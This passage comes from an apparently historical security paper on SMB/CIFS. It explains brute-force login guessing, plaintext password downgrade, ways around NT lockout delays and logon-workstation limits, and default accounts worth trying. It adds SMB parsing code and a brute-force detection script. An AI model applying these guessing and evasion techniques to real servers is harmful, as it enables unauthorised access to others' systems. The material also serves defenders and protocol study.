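int smb_parse(const uint8_t *p, size_t n, struct smb_hdr *h)
{
    if (n < SMB_VWV || smb_block_len(p) + 4 != n) return -1;
    if (p[SMB_HDR] != 0xFF || memcmp(p + SMB_HDR + 1, "SMB", 3) != 0) return -1;
    h->cmd = p[SMB_COM]; h->rcls = p[SMB_RCLS]; h->err = le16(p + SMB_ERR);
    h->wct = p[SMB_WCT]; h->vwv = p + SMB_VWV;
    size_t bcc_off = SMB_VWV + 2 * (size_t)h->wct;        /* byte count follows the words */
    if (bcc_off + 2 > n) return -1;
    h->bcc = le16(p + bcc_off);
    h->buf = p + bcc_off + 2;
    return bcc_off + 2 + h->bcc <= n ? 0 : -1;            /* the buffer must fit as well */
}
static uint16_t smb_vwv(const struct smb_hdr *h, int i) { return le16(h->vwv + 2 * i); }
/* Boil class/code pairs down to: keep guessing, connection still usable, or give up. */
enum smb_outcome interpret_error(uint8_t rcls, uint16_t err)
{
    if (rcls == 0 && err == 0) return SMB_OK;
    if (rcls == ERRSRV && err == ERRbadpw) return SMB_PASSWORD;    /* bad password */
    if (rcls == ERRDOS && err == ERRnoaccess) return SMB_PASSWORD; /* NT's usual "access denied" */
    if (rcls == ERRSRV && err == ERRbaduid) return SMB_NONFATAL;   /* bad UID token, session lives */
    return SMB_FATAL;                                              /* protocol or server trouble */
}
enum smb_outcome block_outcome(const uint8_t *p, size_t n)
{
    struct smb_hdr h;
    return smb_parse(p, n, &h) == 0 ? interpret_error(h.rcls, h.err) : SMB_BAD_BLOCK;
}

/* The dialect list from the text, in the order the client sends it; vwv0 of the negprot
 * reply is the index the server picked (0xFFFF means it accepted none of them). */
static const char *const dialects[] = { "PC NETWORK PROGRAM 1.0", "MICROSOFT NETWORKS 1.03",
                                        "LANMAN1.0", "LM1.2X002", "LANMAN2.1", "NT LM 0.12" };
const char *negprot_dialect(const uint8_t *p, size_t n)
{
    struct smb_hdr h;
    if (smb_parse(p, n, &h) != 0 || h.cmd != SMBnegprot || h.wct < 2) return NULL;
    uint16_t idx = smb_vwv(&h, 0);
    return idx < sizeof dialects / sizeof dialects[0] ? dialects[idx] : NULL;
}

/* vwv1 of the reply, low two bits: bit 0 = user-level security, bit 1 = "use encryption". */
int negprot_sec_mode(const uint8_t *p, size_t n)
{
    struct smb_hdr h;
    if (smb_parse(p, n, &h) != 0 || h.cmd != SMBnegprot || h.wct < 2) return -1;
    return smb_vwv(&h, 1) & 3;
}

/* The optional 8-byte challenge nonce sits in the buffer; vwv11 gives its length. */
const uint8_t *negprot_challenge(const uint8_t *p, size_t n)
{
    struct smb_hdr h;
    if (smb_parse(p, n, &h) != 0 || h.cmd != SMBnegprot || h.wct < 13) return NULL;
    return (smb_vwv(&h, 11) == 8 && h.bcc >= 8) ? h.buf : NULL;
}

/* Constructed sample: a LANMAN-dialect negprot reply as it would appear in a packet dump. */
static const uint8_t negprot_resp[] = {
    0x00, 0x00, 0x00, 0x45, 0xFF, 'S', 'M', 'B', SMBnegprot, /* 69 bytes follow; magic, command */
    0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00,                /* rcls, reserved, err, flags (reply), flags2 */
    0,0,0,0,0,0,0,0,0,0,0,0, 0,0, 0,0, 0,0, 0,0,             /* 12 unused bytes, tid, pid, uid, mid */
    13, 0x04,0x00, 0x03,0x00, 0x04,0x11,                     /* wct; vwv0 dialect 4, vwv1 sec mode 3, vwv2 max xmit */
    0x32,0x00, 0x01,0x00, 0x00,0x00, 0x78,0x56,0x34,0x12,    /* vwv3 max mux, vwv4 max vcs, vwv5 raw mode, vwv6-7 "session key" */
    0,0, 0,0, 0,0, 0x08,0x00, 0x00,0x00,                     /* vwv8-10 time, date, tz; vwv11 key length 8; vwv12 reserved */
    0x08,0x00, 0x11,0x22,0x33,0x44,0x55,0x66,0x77,0x88       /* bcc 8, then the challenge nonce */
};
/* Constructed sample: a SessionSetupAndX reply carrying SERVER/ERRbadpw, no words, no buffer. */
static const uint8_t badpw_resp[] = {
    0x00, 0x00, 0x00, 0x23, 0xFF, 'S', 'M', 'B', SMBsesssetupX, /* 35 bytes follow */
    ERRSRV, 0x00, ERRbadpw, 0x00, 0x80, 0x00, 0x00,             /* rcls = SERVER, err = 2 (little-endian) */
    0,0,0,0,0,0,0,0,0,0,0,0, 0,0, 0,0, 0,0, 0,0, 0, 0x00, 0x00  /* unused, tid..mid, wct 0, bcc 0 */
};
```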

Dialect negotiation must occur on a connection before other SMB types may be sent. If dialect negotiation fails for some reason, the server sends a FIN along with the response and the TCP connection must be closed and reopened. One way to observe this is to try negotiating the dialect either twice or not at all on a given connection. If a server is running in user-level security and a protocol is negotiated that does not support user login at all, the server will generally set the user-level bit anyway and wind up refusing to allow most other SMB transactions on that connection until successful user authentication is performed. This happens during the next phase.

Phase 3: SMB session setup
==========================

A server running in user-level security generally requires this step before allowing access to shared resources. This phase can be skipped entirely against share-level servers, or used anyway to pass additional info about buffer sizes and client capabilities. Normally here is where usernames and passwords get plugged in and the "attack" really begins. The official CIFS name for this phase is SessionSetupAndX, implying once again that additional SMB requests can be, and often are, batched into this block. Note carefully that despite the unfortunately confusing name, this "session setup" is a very DIFFERENT animal from the RFC1001/1002-style TCP "session setup" done in phase 0!
In general the different TCP sessions distinguish between client *machines*, while a "UID" determined during this SMB setup phase distinguishes an individual *user* on a given client. This implies that all SMB traffic between a given client and server pair may pass over a single TCP connection regardless of originating user, although this is not required behavior by any means since servers can support several concurrent TCP connections. It also implies that multiple SMB setup requests can be sent across the single connection instance, which is perhaps the key thing that throws it wide open to various attacks.

The contents of this block and the server response vary somewhat depending on the agreed dialect level and security flags. The most relevant items in the request are a username and either a plaintext password or a hash derived from it. Other items include maximum buffer sizes, various other client information such as its domain and running OS [all of which can be faked up], and perhaps further SMB commands via the AndX mechanism.

Microsoft boxes collect a username and password through one or another "logon" dialog.
Under WFWG, the simplest command-line way to change them on the fly is "net logon {user}" which sets them up for a subsequent "net use". NT requires a login to use the client workstation and saves the username and password from that as default credentials for subsequent filesharing, but these can be overridden in its "net" command line with optional /USER and password arguments. Smbclient accepts "-U username", and asks for a password that it will plug in at the appropriate time. The unmodified version accepts a password on the command line as an optional argument after the sharename, or by using the format "-U user%passwd". In many cases the password must be in all UPPERCASE, but some servers may accept or even require mixed-case even in LANMAN-only dialect -- this is a bit of a crap shoot, so try it both ways. The Samba server has hooks to try a couple of different permutations in an effort to authenticate oddball clients, with appropriate warnings about reduced keyspace.

Under user-level security a successful login means we are basically "in" as either the target user or a guest. The SMB response contains some strings containing the server's OS and version, and an important SMB header field called the UID. This is not quite the same thing as a Unix UID, although for convenience Samba does use the Unix UID of the authenticating user here. Microsoft servers construct an internal set of user credentials and rights and assign the UID as a token that refers to it.
The UID is in theory unique only within the context of the enclosing TCP connection -- if multiple SMB sessions are active across one TCP connection the UID distinguishes the separate users there, and in theory different users on different TCP sockets could wind up being assigned the same UID. There is also a process-ID or PID header field that the *client* initiates, but that seems to hold little relevance except for some file-locking calls. Again, regardless of server platform the UID is merely a reference token, and while playing games with UID/GID values may be effective against NFS servers, trying it here only produces "invalid UID" SMB errors or is simply ignored by the server. The server can optionally set a flag in the setup response that indicates that a given session is a "guest" login. Samba does this and NT does not, but the setting of this bit seems irrelevant to the rights a given active UID has on the server anyway.

There are several possible error responses here, which our interpret_error routine turns into something we can recognize to mean whether to continue the attack or give up. An unknown username and/or password in most cases comes back as "access denied" unless unknown/null users get mapped to GUEST. There are some errors that imply that the supplied credentials were right but there is some other problem, such as "account disabled" or "cannot log in from the network."
In such cases further attempts with a given username will probably be unproductive, but remember that here the TCP connection remains open regardless of the return status, allowing ample opportunity for retries with any other username and password. Protocol errors or transient server problems can also occur, some of which may imply that a new TCP session is needed.

Two important usernames to try right off against Microsoft platforms are ADMINISTRATOR and GUEST, since these usually exist out of the box and all too often have null passwords. If the ADMINISTRATOR login has been renamed to "something obscure" as recommended in several texts, its new name may show up somewhere on the target network as a type 0x3 anyway. As mentioned before, any other base computernames and type 0x3 messaging names collected from the target network are all potential usernames. A machine running the Microsoft web server may have an account of the form IUSR_{basename} that got quietly created during setup, and it is said that the SQL server pulls similar stunts.
A null username or one that is unknown to the server is often accepted as a guest login that allows some limited amount of poking around -- often enough access to at least read files from the server if not write to them. Any hint at an account used for disk backups in an NT environment should be pursued, since such an account probably has "backup" privileges to read the entire filesystem including the normally inaccessible SAM security database. If the server is running Samba itself, a null username and password may grant guest access. Try some Unix accounts that have known or null passwords -- Samba by default disallows logins by accounts with null passwords, but for any allowable ones does not check for a valid user shell like other daemons do. Try likely null ones anyway since some sites may be configured to allow them. An exception to the null-password rule is Samba's default "pcguest" account in smb.conf, which many sites remap to "nobody" or something rather than create a new /etc/passwd entry.

If the client supports password encryption, it uses the user's password as input to one or both of two possible encryption algorithms referred to as the LANMAN method and the NT method. These algorithms are described in CIFS in excruciating detail, and reviewed in Appendix A here. By deliberately dumbing down our negotiated protocol level we can eliminate the need for the NT-style field even if connecting to an NT-dialect server.
For backward compatibility NT accepts the LANMAN password format, which completely obviates the increased security supposedly given by long case-sensitive passwords. It is important to understand that it is the CLIENT that chooses whether or not to use password encryption, and the server's "use encryption" security mode bit is just a gentle suggestion. If a server cannot authenticate via a 24-byte crypto response it is supposed to use whatever is given AS PLAINTEXT. This is another major weakness in the protocol spec, since a compliant server cannot enforce use of encryption! We therefore don't even need "libdes" or the Samba crypto support for our attack kit, we can just send plaintext passwords. Furthermore, since at this point we can send multiple SetupAndX exchanges REGARDLESS of whether they succeed or fail, the opportunity for brute-force guessing is obvious. Most stock client apps are not useful as brute-forcing engines since they exit after one or two failed authentications, but our patch kit modifies smbclient's send_login() routine to keep trying until it either succeeds or runs out of passwords to try.

While this phase is ripe for brute-force attacks, it is also where servers might start logging things. Entries wind up, relative to their respective system-root directories, in "audit.log" under Windows, "config\secevent.evt" under the NT system directory, and "var/log.smb" on a Samba server.
Microsoft platforms [particularly NT] open their log files in an exclusive way that prevents other processes from directly reading or modifying them, and Samba's logfiles can be protected against normal users. Unfortunately the default setup for what *gets* logged is weak or nonexistent. Windows seems only to log full filesharing connection attempts, which do not happen at this phase, and the logging is controlled via simple SYSTEM.INI lines. NT out of the box logs NOTHING -- one must configure the NT "system policy" to *do* the logging for both failed and successful user logins, and only the name given by the connecting client is saved -- NOT its IP address. Other Microsoft platforms have the same problem. Unless someone actively runs "netstat -a" during the attack or provides some third-party enhanced logging facility, no useful backtracing information will be saved. The Samba server by default only logs successful filesharing connections. This pretty much lets an attacker guess at Unix user passwords all day and never be noticed, similar to what vanilla rexec allows. Setting up more meaningful logging gets rather involved and is covered later under "defenses." In all cases, recall also that any TCP connections can be run through an intermediate relay which will cause the relay's IP address to be observed instead of the real source of an attack.

NT servers exhibit several quirks worth mentioning, most of which reveal that the design of the authentication backend is at best naive. A cleartext unicode NT password can be sent in smb_vwv8 but if the alignment is screwed up or the length given as uneven, the returned error is "parameter incorrect" and the event log entry is just "unexpected error." If a properly formed NT password is given under NT LM dialect, encrypted or otherwise, any LANMAN style one in smb_vwv7 is apparently ignored. Upon valid authentication, other error codes returned can mean things like "account disabled", "network access denied", "cannot log in from this workstation", as well as several others that arguably give out too much information that could help guide an attack. Users can be configured such that they can only log in from certain named clients, but not only can the client send an arbitrary caller name, it turns out that using either a null name or even a single space handily bypasses this silly restriction and allows the login anyway.

NT has the capability to "lock out" accounts after some number of failed login attempts.
While there is no specific error to indicate this, it is quite easy to remotely determine [at least against NT 4.0 with non-permanent user lockout policy] when a temporary account lockout happens. Any failed login usually causes the server to delay for 2 or 3 seconds before sending the SMB "access denied" error, to slow down brute-force attacks. Attempts on a valid username will elicit these delayed responses until the lockout threshold is reached, and then suddenly there is NO delay anymore and subsequent guesses on the same username are denied immediately! If account lockout is enabled, the default threshold is between 5 and 10 tries and the lockout time is 30 minutes. Therefore in most cases it doesn't take very long to make the lockout perceptibly happen.

If attempts on one known-to-exist username trigger login-failure lockout but another one does not, chances are that the second one is the administrator account. Conversely, if attempts on ADMINISTRATOR trigger lockout, it is probably a decoy and the real one has been renamed. Lockout does not apply to the administrative account, with the ostensible idea being prevention of *total* denial of service attacks. This leaves ADMINISTRATOR or the equivalent accountname open to unlimited guessing. Even the access-denied delay can be effectively bypassed. The delay is imposed per TCP connection, so by opening up 10 connections and pounding in different sets of passwords an attacker gets a tenfold increase in brute-force speed.
Such an attack probably occupies significant server CPU time since not only
does the event logging go crazy, but each plaintext guess must be re-hashed
on the *server* side for comparison against the stored OWF. A workaround
sometimes suggested to combat this is an obscure registry setting that causes
the whole server to shut down when the event log fills, but that just allows
an even worse denial of service.

Phase 4: IPC Tree connect
=========================

Now that we are logged in, we can begin exploring what resources the target
has to offer. A "tree connect" traditionally implies a directory tree in a
filesystem, but in SMB there is a special type of shared resource referred to
as a named pipe or IPC -- familiar terms to Unix people. Tree connect is
sometimes also called StartConnection or TCon. A tree connect is performed to
access any resource, be it a filesystem, a printer, or a named pipe. Pipes
provide a means for exchanging "API calls" of various types between client and
server, and besides mentioning a couple of specific API types this document
does not cover them in any further detail. Besides, according to CIFS the
newer [and Microsoft-originated, rather than third-party?] RPC facility is
the recommended interface for such things, implying that the named-pipe API
may eventually be phased out.
Nonetheless the current interface to get information about the server is
still a named-pipe transaction, so in this case we need to do an IPC tree
connect to obtain the server's "share list" and discover what *other* things
we can connect to.

There is a field in this SMB for a password, which is used if needed for
accessing filesystems on share-level servers. The IPC tree connect we need
here should not require a password, but there may be odd cases or other types
that do. The other fields contain the service type and name which in this
specific case are the two strings "IPC" and "\\SERVER\IPC$". There is an AndX
form of this SMB so more requests can be chained onto it -- often used for
quick one-off requests such as getting share lists. Sometimes the tree
connect itself is tacked on to the SMB session setup as the AndX request. In
general if a given phase doesn't appear by itself in a packet dump, check for
an AndX in the previous request. For example, session setup returning with a
nonzero TID probably resulted from sending the setup and TCon as one big SMB.

The Microsoft "net view \\servername" command should show the share-list of
the target, EXCEPT for any "hidden" sharenames that end with "$" per the
stupid client-side design. [This is described below.] If no existing TCP
session is established yet, "net view" will behind the scenes go through all
the SMB steps needed to get to this point. We can usually see any and all
shares with smbclient, where we specify "-L servername" to list them and some
other info such as browse lists of neighboring machines. These lists are all
gotten via API transactions of various sorts with the well-known standard
"\PIPE\LANMAN" service -- possibly because LANMAN 1 was the first dialect to
support named pipes at all. This is a black box in the scope of this document
but suffice to say it involves wacky strings like "WrLehDO" and "B16BBDz"
plugged into SMB "Trans" requests. Some but not nearly all of this is
documented in CIFS.

A successful tree connect response fills in a two-byte SMB header field called
the tree-ID or TID. This is another arbitrary cookie that the client must
send back with any subsequent interactions with the resource in question.
A client can have more than one active TID at a time. Once the IPC TID is
established, I/O to the named pipe can begin. After any successful TCon, the
TCP connection should remain open even if there is no subsequent SMB activity
for a while.
CIFS states that correct server behavior is that it should only time out
truly inactive client connections, where "inactive" is apparently defined as
having no current tree connections and not sending any SMB requests, but most
servers seem to eventually knock down connections with or without active TIDs
anyway.

Errors here are many and varied, and again interpret_error helps us figure
out what is going on. In user-level security "access denied" means that the
tree connect was attempted without the necessary prior authentication from
SessionSetupAndX, and in share-level may simply mean the wrong share password
was given. "Bad password" is more common in the latter case. Another common
error is "invalid network name" from an attempt to connect to some resource
that the server doesn't have. Samba issues server-class "access denied" if
its IP-level allow/deny configuration disallows a service TCon. For the most
part if any errors other than those just described are returned from an IPC
TCon, we are probably in a fairly hopeless state and should start over.

Some old clients cannot do user-level security, so the CIFS spec optionally
allows for backward compatibility by having the server assume that the calling
name of a client machine is also the username for session setup purposes.
If the caller name maps to a known username and that user's correct password
is supplied as a share password in a TCon, an implicit user login is performed
and SetupAndX can be skipped.
NT and possibly other user-level Microsoft servers don't seem to comply with
this, handing back "bad UID" errors for other SMB requests until a real
session setup is completed. Samba supports it by building an internal concept
of the "potential user" of a given connection and checking if various names
and SMB parameters from previous phases are valid usernames and passwords.
This does not necessarily imply protocol weakness or that SetupAndX should be
skipped if possible -- Samba does most of its logging at TCon time, for
example. Besides, changing the attempted username in this scenario requires a
new client connection with a different caller name. Generally if a server
specifies user-level security then any brute-force attack should be performed
at the setup phase.

Some servers deny certain kinds of API calls based on the rights of the user
login; in particular, giving NT both a null username *and* password allows a
session setup but is recorded [if at all] as an "anonymous" login rather than
GUEST, and seems to deny viewing the share list and server info but allow
viewing the browse list.
This is likely intentional, since clients need to make such periodic quick
connections to master browsers to collect more "network neighborhood" info.
[See Samba's "nmbsync" utility for an example.] To clarify somewhat, a
*share* list is equivalent to the exported filesystems on the target server,
and a *browse* list contains names of neighboring computers. This can easily
be confused, especially where smbclient's routine to list server shares is
still called browse_host! Again, a server with a browse list often can be
address-queried for each of the listed names to find more targets. If we can
dump the share list, this informs us what filesystem shares we might be able
to start fooling with in the next phase.

Phase 5: Fileshare tree connect
===============================

This is the same as any other tree connect except that the service type
becomes "A:" to mean "disk" [go figure...] and we connect to "\\SERVER\FOO"
where FOO is the sharename. Fileshares generally begin at a subdirectory
somewhere in the local disk, and their names are usually unrelated to the
subdirectory path. Sharenames are chosen by human administrators, which along
with the optional comment fields visible in the share list might at least hint
at what they encompass. A mounted share makes the subdirectory and everything
from there downward visible to a client across the network.

This phase is reached via successful completion of the client commands most
familiar to users.
Usernames and passwords from dialogs or command-line arguments are supplied
where needed. Doing "Net use * \\SERVER\SHARE" makes a Microsoft client try
contacting SERVER, mount the named SHARE, and assign the next free drive
letter to it. "Smbclient \\\\SERVER\\SHARE" with optional arguments is roughly
equivalent, although the mount is only per-process and is disconnected when
smbclient exits.

A new TID is returned on success, which thereafter must appear in every SMB
header that refers to this mount. Almost all servers implement a distinction
between read-only access to a fileshare and read-write. WFWG and other
share-level servers often provide for two possible passwords, one of which
allows writing to the share. User-level servers usually ignore any supplied
TCon password and presumably assign access rights based on the connecting
user. NT of course has its slew of user privileges and ACLs on files and
directories -- the much-ballyhooed holdovers from VMS. Samba primarily relies
on Unix file permissions, madly swapping its effective Unix UID around to
match that of the corresponding SMB user session before trying to access
files. Samba also imposes several restrictions on "guest" sessions, such as
not being able to write anything. There doesn't seem to be any clean way of
determining a remote session's access rights other than trying to perform
various operations.
Retrieving a directory or file obviously indicates successful read access, and
a simple low-impact way to check for write access is to try creating and then
deleting a new directory. At first this all sounds reasonably secure if the
surrounding UID and TID checking is sound, but there are still a few problems
with the fundamental design.

Most of the possible errors from this step have already been mentioned.
"Access denied" or "bad password" mean the obvious in user or share level
security modes; NT sends the former if a regular user tries to connect to any
of the special C$ or ADMIN$ type of shares described below. Share-level
servers usually allow unlimited guesses at share passwords, and deliberate
delays for incorrect passwords are almost unheard of here. Thus they are not
only open to the same types of brute-force attacks over the network, but such
attacks can proceed almost at the speed of the intervening wire. If the
guesses come in too fast some servers can't handle it and just belly-up --
WFWG is one example -- and it is often necessary to throttle back the guessing
rate just to get all the way through a dictionary.

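To make the tree-connect exchange and the error codes from Phases 4 and 5
concrete, here is an added example (not part of the original paper, and not
Samba's code) that decodes NetBIOS-framed SMB1 messages: the 32-byte header
with its TID and UID, the AndX chain (so a TCon tacked onto a SessionSetupAndX
is still found), the path and service strings of a TreeConnectAndX request,
and the DOS-style class/code status that the "access denied", "bad password",
"invalid network name" and "bad UID" errors above are carried in. The sample
messages are constructed inside the block, not captured traffic; the field
layout follows MS-CIFS for the OEM (non-Unicode) string form of the old
dialects, and the "$" check exists because that suffix hides a share only in
Microsoft clients, never from the server.

```python
import struct

# SMB1 framing per MS-CIFS: 4-byte NetBIOS session header, 32-byte SMB header, then
# one or more blocks of [WordCount][Words][ByteCount][Bytes].  Assumed: OEM strings only.
SMB_HEADER = struct.Struct("<4sBIBHH8sHHHHH")
SMB_MAGIC = b"\xffSMB"
FLAGS_REPLY, FLAGS2_NT_STATUS, FLAGS2_UNICODE = 0x80, 0x4000, 0x8000
ANDX_NONE = 0xFF
COMMANDS = {0x72: "NEGOTIATE", 0x73: "SESSION_SETUP_ANDX", 0x74: "LOGOFF_ANDX",
            0x75: "TREE_CONNECT_ANDX", 0x71: "TREE_DISCONNECT", 0x2B: "ECHO"}
ANDX_COMMANDS = {0x73, 0x74, 0x75}
# DOS-style Status: ErrorClass byte (1 = ERRDOS, 2 = ERRSRV), reserved byte, 16-bit ErrorCode.
DOS_ERRORS = {(1, 3): "ERRDOS/ERRbadpath", (1, 5): "ERRDOS/ERRnoaccess (access denied)",
              (2, 2): "ERRSRV/ERRbadpw (bad password)", (2, 4): "ERRSRV/ERRaccess (access denied)",
              (2, 6): "ERRSRV/ERRinvnetname (invalid network name)", (2, 91): "ERRSRV/ERRbaduid (bad UID)"}

def parse_header(msg):
    magic, cmd, status, flags, flags2, pid_hi, _, _, tid, pid_lo, uid, mid = SMB_HEADER.unpack_from(msg)
    if magic != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    return {"command": cmd, "status": status, "flags": flags, "flags2": flags2,
            "tid": tid, "pid": (pid_hi << 16) | pid_lo, "uid": uid, "mid": mid}

def describe_status(hdr):
    """Name the error a response carries; NTSTATUS form only if Flags2 says so."""
    if hdr["flags2"] & FLAGS2_NT_STATUS:
        return "success" if hdr["status"] == 0 else "NTSTATUS 0x%08x" % hdr["status"]
    cls, code = hdr["status"] & 0xFF, (hdr["status"] >> 16) & 0xFFFF
    return "success" if cls == 0 else DOS_ERRORS.get((cls, code), "class %d code %d" % (cls, code))

def read_block(msg, off):
    wc = msg[off]
    words = msg[off + 1:off + 1 + 2 * wc]
    (bc,) = struct.unpack_from("<H", msg, off + 1 + 2 * wc)
    return words, msg[off + 3 + 2 * wc:off + 3 + 2 * wc + bc]

def parse_tree_connect_request(words, data, unicode):
    # Words: AndXCommand, AndXReserved, AndXOffset, Flags, PasswordLength; Bytes: Password, Path, Service
    if unicode:
        raise NotImplementedError("only the OEM string form of the old dialects is handled")
    pwlen = struct.unpack("<BBHHH", words)[4]
    path, _, tail = data[pwlen:].partition(b"\x00")
    return {"path": path.decode("latin-1"), "service": tail.partition(b"\x00")[0].decode("latin-1")}

def decode(raw):
    """Return (header, [(command name, detail), ...]), following any AndX chain in the message."""
    if raw[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    msg = raw[4:4 + int.from_bytes(raw[1:4], "big")]
    hdr = parse_header(msg)
    is_response = bool(hdr["flags"] & FLAGS_REPLY)
    chain, cmd, off = [], hdr["command"], SMB_HEADER.size
    while cmd != ANDX_NONE:
        words, data = read_block(msg, off)
        detail = {}
        if cmd == 0x75 and not is_response:
            detail = parse_tree_connect_request(words, data, hdr["flags2"] & FLAGS2_UNICODE)
        chain.append((COMMANDS.get(cmd, "0x%02x" % cmd), detail))
        if cmd not in ANDX_COMMANDS or len(words) < 4:
            break
        cmd, _, off = struct.unpack_from("<BBH", words)  # AndXOffset is counted from the SMB header
    return hdr, chain

def hidden_share(path):
    """A '$' suffix hides a share only in Microsoft clients; the server still sees the request."""
    return path.rstrip("\\").rsplit("\\", 1)[-1].endswith("$")

def tree_connects(raw):
    """(path, service, hidden?) for every TreeConnectAndX in a request, chained or not."""
    return [(d["path"], d["service"], hidden_share(d["path"]))
            for name, d in decode(raw)[1] if name == "TREE_CONNECT_ANDX" and d]

# ---- constructed sample messages, built here for the example rather than captured ----
def _frame(msg):
    return b"\x00" + len(msg).to_bytes(3, "big") + msg

def _header(cmd, status=0, flags=0x18, tid=0):
    return SMB_HEADER.pack(SMB_MAGIC, cmd, status, flags, 0x0001, 0, b"\x00" * 8, 0, tid, 0x1234, 0x0800, 1)

def _tcon_block(path, service):
    data = b"\x00" + path.encode("latin-1") + b"\x00" + service.encode("latin-1") + b"\x00"
    return bytes([4]) + struct.pack("<BBHHH", ANDX_NONE, 0, 0, 0, 1) + struct.pack("<H", len(data)) + data

def build_tree_connect(path, service):
    return _frame(_header(0x75) + _tcon_block(path, service))

def build_setup_with_tcon(user, path, service):
    """SessionSetupAndX (10-word LANMAN form) with a TreeConnectAndX chained onto it."""
    data = b"\x00" + user.encode("latin-1") + b"\x00WORKGROUP\x00Unix\x00Samba\x00"
    words = struct.pack("<BBHHHHIHI", 0x75, 0, 0, 0xFFFF, 2, 0, 0, 1, 0)
    setup = bytes([10]) + words + struct.pack("<H", len(data)) + data
    andx_off = struct.pack("<H", SMB_HEADER.size + len(setup))  # the chained block follows directly
    return _frame(_header(0x73) + setup[:3] + andx_off + setup[5:] + _tcon_block(path, service))

def build_response(cmd, tid=0, err=(0, 0)):
    """Header-only reply (WordCount 0, ByteCount 0); err is a DOS (class, code) pair."""
    return _frame(_header(cmd, err[0] | (err[1] << 16), FLAGS_REPLY | 0x18, tid) + b"\x00\x00\x00")
```

Run over a capture, decode() gives a sensor the TID the server handed out
and every share path a client asked for, "$" names included, while
describe_status() on the reply separates a share that does not exist
(ERRinvnetname) from one the caller was refused (ERRaccess); that is exactly
the pair of answers a blind share or username probe lives on, so both are
worth logging per source address.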
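The lockout and per-connection delay behaviour described under the session
setup discussion, and the undelayed share-password guessing just described,
are what a server-side monitor should be watching for. The following is an
added example (mine, not from the paper or from Samba) that runs a detection
pass over a constructed authentication log. The log format is an assumption
made for the example; its latency_ms field stands for the request-to-response
delay a sensor on the wire would measure, since NT's own event log records a
lockout directly rather than through timing. Three things get flagged: one
account hammered from several concurrent connections inside a short window
(the tenfold trick), a run of delayed denials that suddenly become instant
(the lockout threshold was just crossed, and the client can tell), and an
account that accumulates failures past the threshold without ever locking out
(the lockout-exempt administrator, or a share-level server with no delay at
all).

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed log format (an assumption for this example, not NT's or Samba's own):
#   <ISO timestamp> src=<ip>:<port> user=<name> result=ok|denied latency_ms=<n>
LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<ip>[\d.]+):(?P<port>\d+) user=(?P<user>\S+) "
                     r"result=(?P<result>\w+) latency_ms=(?P<lat>\d+)$")

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    return {"ts": datetime.fromisoformat(d["ts"]), "conn": (d["ip"], int(d["port"])),
            "user": d["user"].upper(), "ok": d["result"] == "ok", "latency": int(d["lat"])}

def analyse(lines, window_s=60, conn_threshold=5, lockout_threshold=5, delay_ms=1000):
    """Return (alert, user, count) tuples for the brute-force patterns described in the text."""
    events = sorted((e for e in map(parse, lines) if e), key=lambda e: e["ts"])
    failures = defaultdict(list)
    for e in events:
        if not e["ok"]:
            failures[e["user"]].append(e)
    alerts = []
    for user, fails in failures.items():
        # 1. Per-connection delay bypass: many distinct connections guessing one account at once.
        for i, first in enumerate(fails):
            in_window = [f for f in fails[i:] if (f["ts"] - first["ts"]).total_seconds() <= window_s]
            conns = {f["conn"] for f in in_window}
            if len(conns) >= conn_threshold:
                alerts.append(("parallel-bruteforce", user, len(conns)))
                break
        # 2. Delayed denials turning instant: the lockout threshold was just crossed.
        delayed_seen = False
        for n, f in enumerate(fails):
            if f["latency"] >= delay_ms:
                delayed_seen = True
            elif delayed_seen:
                alerts.append(("lockout-tripped", user, n))
                break
        else:
            # 3. Past the threshold with no lockout: an exempt account, or a server with no delay.
            if len(fails) > lockout_threshold:
                alerts.append(("lockout-exempt", user, len(fails)))
    return alerts

def _line(ts, ip, port, user, result, latency):
    return "%s src=%s:%d user=%s result=%s latency_ms=%d" % (ts, ip, port, user, result, latency)

# Constructed sample: BACKUP is probed until it locks out, ADMINISTRATOR is hit from six
# connections at once and never locks out, joe mistypes once and then logs in.
SAMPLE_LOG = (
    [_line("1997-01-14T10:00:%02d" % s, "10.1.2.3", 1044, "BACKUP", "denied", lat)
     for s, lat in enumerate([2100, 2050, 2200, 2100, 2000, 12, 10])]
    + [_line("1997-01-14T10:05:%02d" % s, "10.1.2.3", 1100 + s % 6, "ADMINISTRATOR", "denied", 2000)
       for s in range(12)]
    + [_line("1997-01-14T10:09:00", "10.1.2.9", 1201, "joe", "denied", 2100),
       _line("1997-01-14T10:09:05", "10.1.2.9", 1201, "joe", "ok", 35)]
)

if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

The thresholds are deliberately close to the NT defaults the text gives (5 to
10 failures, a 2 to 3 second delay); against a share-level server that never
delays, every account will show up under the third rule as soon as it passes
lockout_threshold, which is the right outcome since nothing else will stop
the guessing there.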
Microsoft clients seem to treat any resource name ending with "$" as "hidden"
and it is even documented that while such fileshare names won't show up
during browsing, they are available to someone who "knows the name." In
most cases smbclient will gladly show us all the hidden shares on a server
regardless, since once again any such concealment is up to the client side.
Interestingly, "IPC$" also falls into this class. NT almost always sets up a
predefined set of hidden administrative "default" shares, named "C$" for the
whole C drive, "D$" for the whole D drive if present, and "ADMIN$" or perhaps
"WINNT$" pointing into the top of the system directory. While visible via
smbclient, TCons to them by anything other than an administrator login are
generally denied but are always worth trying anyway. As mentioned in several
NT security texts these sharenames are automatically set up at every reboot,
making it likely that a cracked administrator password gives carte blanche
access to the entire machine.

Once a fileshare tree connection has been made, normal network-filesystem
I/O is possible using more SMBs to read and write files, search directories,
get and set attributes, do exclusive locks, or whatever. This is why SMBs
can be large -- for efficiency, since data read or written occupies the
buffer portion of the blocks.
As in NFS, there is no concept of the current directory except in the client,
which must construct and send a full pathname along with the right TID for
every file reference. Despite the spec stating that having any active tree
connect should disable server timeouts, most clients periodically send some
kind of null SMB to keep things warm -- either an SMB echo or, in the case of
Samba, a status check of the root directory. The opposite of TCon is an SMB
called Tree Disconnect or TDis, which tears down an existing TCon and
invalidates the TID. The transport connection remains open for some time
afterward, during which other SMBs including a new TCon can be issued.
Multiple tree connects can be concurrently active, such as an open fileshare
or two and a quick IPC to get an updated browse list or something.

The ability to make several arbitrary fileshare tree connects has an
interesting side effect against Samba servers, which commonly make user home
directories available as the special [HOMES] share. Where this share points
to changes dynamically if it matches an existing Unix user, and by default
the username to authenticate against is taken from the sharename unless
